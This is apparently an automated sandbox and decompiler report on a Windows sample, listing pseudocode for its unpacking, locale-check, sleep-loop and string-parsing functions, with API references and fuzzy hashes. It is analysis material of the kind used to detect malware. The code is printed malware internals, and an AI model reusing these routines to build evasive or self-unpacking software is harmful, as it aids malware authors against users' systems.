0x00401865
0x00401867
0x00401867
0x0040186e

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00401839
GetModuleHandleA.KERNEL32(00000000), ref: 00401849
GetCommandLineW.KERNEL32 ref: 00401854

Part of subcall function 00401493: NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
Part of subcall function 00401493: Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
Part of subcall function 00401493: GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
Part of subcall function 00401493: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
Part of subcall function 00401493: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
Part of subcall function 00401493: GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F

HeapDestroy.KERNEL32 ref: 00401867
ExitProcess.KERNEL32 ref: 0040186E

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
String ID:
API String ID: 1863574965-0
Opcode ID: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
Instruction ID: c66274986b3ea6f1620f212ac01f8038ee2d29bdd939a4d2e60d119bbebbbe51
Opcode Fuzzy Hash: 97b04516d4304a837a7655c5891b85a5ac373015af52e8364f4eed2c235b444e
Instruction Fuzzy Hash: B7E0B671402720ABC3112FB1AF0CA4F3E28BB0A7527048536F605F22B1CB780A01CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 008C2689 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 008C26E6
SysAllocString.OLEAUT32(008C23DF), ref: 008C272A
SysFreeString.OLEAUT32(00000000), ref: 008C273E
SysFreeString.OLEAUT32(00000000), ref: 008C274C

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 76ef5f76215fcaaaa39bb67c464bf964af7ae696409d20ac85348d5b7496402a
Instruction ID: c60d0522ca562f087206d8b1cc3a3efeebb95599fed8caa56401e696ea3baa95
Opcode Fuzzy Hash: 76ef5f76215fcaaaa39bb67c464bf964af7ae696409d20ac85348d5b7496402a
Instruction Fuzzy Hash: E231D976900249EFCB05DF98D8D4DAE7BB9FF58344B10842EF906D7250D7709941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008C2CEC Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E008C2CEC(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L008C8406();
					_t34 = _t16 + _t13;
					_t17 = E008C4D24(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x008c2cf1
0x008c2cfc
0x008c2cfd
0x008c2cfd
0x008c2d09
0x008c2d12
0x008c2d15
0x008c2d19
0x008c2d1b
0x008c2d20
0x008c2d21
0x008c2d22
0x008c2d2c
0x008c2d2f
0x008c2d36
0x008c2d3a
0x008c2d41
0x008c2d47
0x008c2d51

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,008C72FE,?,?), ref: 008C2CFD
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,008C72FE,?,?), ref: 008C2D09
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 008C2D22

Part of subcall function 008C4D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 008C4DC3

Sleep.KERNELBASE(00000003,00000000,?,00000001,?,?,?,008C72FE,?,?), ref: 008C2D41

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: 09a94966d84565a227b2a19184471731ec15d748fccf5d1d1328db48864c1f26
Instruction ID: 80968d5b3a75a66c66e8c8839ccf66e0f5b85da5d318e1b87bf7acba67b94003
Opcode Fuzzy Hash: 09a94966d84565a227b2a19184471731ec15d748fccf5d1d1328db48864c1f26
Instruction Fuzzy Hash: 50F0A477A40604BBD7149BA4DC1EFDF76B9E784361F100164F602E7240E6B8DA018690

Uniqueness

Uniqueness Score: -1.00%

Function 008C3D80 Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E008C3D80(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x8ca3cc; // 0x1309600
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x8ca3cc; // 0x1309600
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x8ca030) {
					HeapFree( *0x8ca2d8, 0, _t8);
				}
				_t9 = E008C4076(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x8ca3cc; // 0x1309600
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}

0x008c3d80
0x008c3d80
0x008c3d89
0x008c3d99
0x008c3d99
0x008c3d9e
0x008c3da3
0x00000000
0x00000000
0x008c3d93
0x008c3d93
0x008c3da5
0x008c3da9
0x008c3dbb
0x008c3dbb
0x008c3dc6
0x008c3dcb
0x008c3dce
0x008c3dd3
0x008c3dd7
0x008c3ddd

APIs

RtlEnterCriticalSection.NTDLL(013095C0), ref: 008C3D89
Sleep.KERNEL32(0000000A), ref: 008C3D93
HeapFree.KERNEL32(00000000,00000000), ref: 008C3DBB
RtlLeaveCriticalSection.NTDLL(013095C0), ref: 008C3DD7

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 2a1af7e43afbf1191854fce6666630af14ecea8b0e8b79a802d478ac9c25f5b2
Instruction ID: f61a6591830b76c0f67b8c7586278def894f6f993aef5168e9329ed0ed4b93c7
Opcode Fuzzy Hash: 2a1af7e43afbf1191854fce6666630af14ecea8b0e8b79a802d478ac9c25f5b2
Instruction Fuzzy Hash: B2F0F870200A45ABDB249FA9EC4CF163BF4FB50388B048458F686C62B1C730D841DB26

Uniqueness

Uniqueness Score: -1.00%

Function 008C61FE Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C61FE(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E008C1CE6(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x8ca348; // 0xa3d5a8
				_t4 = _t24 + 0x8cbe30; // 0x13093d8
				_t5 = _t24 + 0x8cbdd8; // 0x4f0053
				_t26 = E008C3A53( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x8ca348; // 0xa3d5a8
						_t11 = _t32 + 0x8cbe24; // 0x13093cc
						_t48 = _t11;
						_t12 = _t32 + 0x8cbdd8; // 0x4f0053
						_t52 = E008C262D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x8ca348; // 0xa3d5a8
							_t13 = _t35 + 0x8cbe6e; // 0x30314549
							_t37 = E008C3969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x8ca2fc - 6;
								if( *0x8ca2fc <= 6) {
									_t42 =  *0x8ca348; // 0xa3d5a8
									_t15 = _t42 + 0x8cbdba; // 0x52384549
									E008C3969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x8ca348; // 0xa3d5a8
							_t17 = _t38 + 0x8cbe68; // 0x1309410
							_t18 = _t38 + 0x8cbe40; // 0x680043
							_t45 = E008C187F(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x8ca2d8, 0, _t52);
						}
					}
					HeapFree( *0x8ca2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E008C1544(_t54);
				}
				return _t45;
			}

0x008c61fe
0x008c620e
0x008c6211
0x008c6218
0x008c621a
0x008c621a
0x008c621d
0x008c6222
0x008c6229
0x008c6236
0x008c623b
0x008c623f
0x008c624d
0x008c625b
0x008c625f
0x008c62f0
0x008c62f0
0x008c6265
0x008c6265
0x008c626a
0x008c626a
0x008c6271
0x008c627d
0x008c627f
0x008c6281
0x008c6283
0x008c628a
0x008c6295
0x008c629c
0x008c629e
0x008c62a5
0x008c62a7
0x008c62ae
0x008c62b9
0x008c62b9
0x008c62a5
0x008c62be
0x008c62c3
0x008c62ca
0x008c62e8
0x008c62ea
0x008c62ea
0x008c6281
0x008c62fc
0x008c62fc
0x008c62fe
0x008c6303
0x008c6305
0x008c6305
0x008c6310

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,013093D8,00000000,?,74D0F710,00000000,74D0F730), ref: 008C624D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,01309410,?,00000000,30314549,00000014,004F0053,013093CC), ref: 008C62EA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,008C521B), ref: 008C62FC

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: efacffd0993594f926ab3bdf9ffa24a38862669da1bb01845d1d3402fb85b275
Instruction ID: 81199cacc0c93942a744a5e5c07e8907d0729bddfd04a36df81f3a2b325b6eb3
Opcode Fuzzy Hash: efacffd0993594f926ab3bdf9ffa24a38862669da1bb01845d1d3402fb85b275
Instruction Fuzzy Hash: 2C319E72A0021CBFCB119BA4DC89FEA3BBCFB45B04F0800A9BA01E7161E7719E54DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00401E3D Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00401E3D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x403180;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x00401e47
0x00401e54
0x00401e5a
0x00401e66
0x00401e76
0x00401e78
0x00401e80
0x00401f15
0x00401f1c
0x00000000
0x00000000
0x00000000
0x00401e86
0x00401e86
0x00401e86
0x00401e8a
0x00000000
0x00000000
0x00401e96
0x00401e9a
0x00401ebe
0x00401ec2
0x00401ed6
0x00401ed6
0x00401edc
0x00401eeb
0x00401eef
0x00401ef7
0x00401ef7
0x00401eff
0x00401f02
0x00401f0f
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f0f
0x00401eca
0x00401ece
0x00401ed4
0x00000000
0x00000000
0x00000000
0x00401ed4
0x00401ea2
0x00401ea6
0x00401eb0
0x00401ea8
0x00401ea8
0x00401ea8
0x00000000
0x00401ea6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
GetLastError.KERNEL32 ref: 00401EF1

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
Instruction ID: 3241aa71f1d949b352c2025a784480cc2ce18444d2ae61006a318d933437353e
Opcode Fuzzy Hash: 651d8e0ddf3ca5bf17853d60118bc462648b44d6942099e56a14baf6d27ff26b
Instruction Fuzzy Hash: 6521607180020ADFCB14CF95C985EBEF7B4FF48345F11446AD506E7164E3B8AA64CB98

Uniqueness

Uniqueness Score: -1.00%

Function 008C4076 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E008C4076(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E008C7A71(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x8c9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x008c407a
0x008c4087
0x008c4089
0x008c408a
0x008c4092
0x008c4092
0x008c4096
0x00000000
0x00000000
0x008c408d
0x008c408e
0x008c4091
0x008c4091
0x008c409e
0x008c40a3
0x008c40a8
0x008c40b0
0x008c40b6
0x008c40b8
0x008c40bb
0x008c40bf
0x008c40c1
0x008c40c4
0x008c40c4
0x008c40c5
0x008c40c7
0x008c40c4
0x008c40d1
0x008c40d4
0x008c40d7
0x008c40d8
0x008c40da
0x008c40e1
0x008c40e1
0x008c40ed

APIs

StrChrA.SHLWAPI(?,00000020,00000000,013095FC,?,?,008C3DCB,?,013095FC), ref: 008C4092
StrTrimA.KERNELBASE(?,008C9278,00000002,?,008C3DCB,?,013095FC), ref: 008C40B0
StrChrA.SHLWAPI(?,00000020,?,008C3DCB,?,013095FC), ref: 008C40BB

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: b315bc1d0fdfc4407923eb5e0e977510b8e33099391ab5f663048d192c70637e
Instruction ID: 8739b16387b19959e59c5616f4cdfd3e563869c640936bdf5cbd41944fb925d1
Opcode Fuzzy Hash: b315bc1d0fdfc4407923eb5e0e977510b8e33099391ab5f663048d192c70637e
Instruction Fuzzy Hash: A301D471380749AFE7504A2ACC68F677BADFBD5354F446019BB91CB292D930CC81C660

Uniqueness

Uniqueness Score: -1.00%

Function 008C4BD5 Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E008C4BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E008C2689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x8ca348; // 0xa3d5a8
						_t20 = _t68 + 0x8cb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E008C1061(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x008c4bdb
0x008c4bde
0x008c4bee
0x008c4bf7
0x008c4bfb
0x008c4cc9
0x008c4ccf
0x008c4ccf
0x008c4c15
0x008c4c1a
0x008c4c1e
0x008c4c24
0x008c4c29
0x008c4c30
0x008c4c3f
0x008c4c3f
0x008c4c43
0x008c4c45
0x008c4c51
0x008c4c5c
0x008c4c67
0x008c4c6b
0x008c4c75
0x008c4c79
0x008c4c7b
0x008c4c80
0x008c4c87
0x008c4c97
0x008c4c97
0x008c4c80
0x008c4c79
0x008c4c99
0x008c4c9e
0x008c4ca3
0x008c4ca3
0x008c4ca6
0x008c4caf
0x008c4cb4
0x008c4cb4
0x008c4cb9
0x008c4cbe
0x008c4cbe
0x008c4cb9
0x008c4c43
0x008c4cc0
0x008c4cc6
0x00000000

APIs

Part of subcall function 008C2689: SysAllocString.OLEAUT32(80000002), ref: 008C26E6
Part of subcall function 008C2689: SysFreeString.OLEAUT32(00000000), ref: 008C274C

SysFreeString.OLEAUT32(?), ref: 008C4CB4
SysFreeString.OLEAUT32(008C23DF), ref: 008C4CBE

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 5f6a3d1f7a47281c8c6faa132a021bb028654eb3acd694574c445c181b107aad
Instruction ID: d72c9b09dc49b8ee0ab0a605c2bd08ec91ca1d9917f9e3562057866098689152
Opcode Fuzzy Hash: 5f6a3d1f7a47281c8c6faa132a021bb028654eb3acd694574c445c181b107aad
Instruction Fuzzy Hash: 7C314972500119EFCB11DFA9C898D9BBB79FFC97407154A58F805DB220D632DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004011F6 Relevance: 3.1, APIs: 2, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011F6() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				void* _t24;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x403184;
				if( *0x40316c > 5) {
					_t16 = _t15 + 0x4040f9;
				} else {
					_t16 = _t15 + 0x4040b1;
				}
				E00401329(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				_t24 = E00401920( &_v32,  &_v16,  *0x403180 ^ 0xf7a71548); // executed
				if(_t24 == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x403178);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E00401A49(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t40 =  *0x403178;
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x403178 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E00401FBA(_t45, _t40, _t32 + 4);
						}
					}
					_t25 = E00401875(_v28); // executed
				}
				ExitThread(_t25);
			}

0x004011fc
0x0040120d
0x00401217
0x0040120f
0x0040120f
0x0040120f
0x0040121e
0x00401227
0x0040122c
0x00401243
0x0040124a
0x004012a7
0x0040124c
0x00401252
0x00401258
0x00401266
0x0040126a
0x00401271
0x00401273
0x00401279
0x0040127d
0x00401285
0x00401296
0x00401287
0x0040128d
0x0040128d
0x00401285
0x0040129e
0x0040129e
0x004012a9

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 00401252
ExitThread.KERNEL32 ref: 004012A9

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
Instruction ID: b06575ce47738e750fa21101d439a179049e3a3f6f5bd6bf59ccf56b07c94354
Opcode Fuzzy Hash: 790b61abaedcbdc4a60141dd56dd6f5efea9b863add848607eda0236650ecbbf
Instruction Fuzzy Hash: B211AC71504205ABE701DBA5DD09E9777ECAB48304F05497BB601F71B0EB38E6098B59

Uniqueness

Uniqueness Score: -1.00%

Function 008C3969 Relevance: 3.0, APIs: 2, Instructions: 50
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C3969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E008C3D2E(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E008C1940(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E008C6BEB(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x8ca2d8, 0, _t25);
				}
				return _t22;
			}

0x008c3969
0x008c397a
0x008c397e
0x008c39d9
0x008c3980
0x008c3987
0x008c398f
0x008c3992
0x008c3997
0x008c399b
0x008c39a1
0x008c39a9
0x008c39ac
0x008c39c4
0x008c39c4
0x008c39cf
0x008c39cf
0x008c39e0

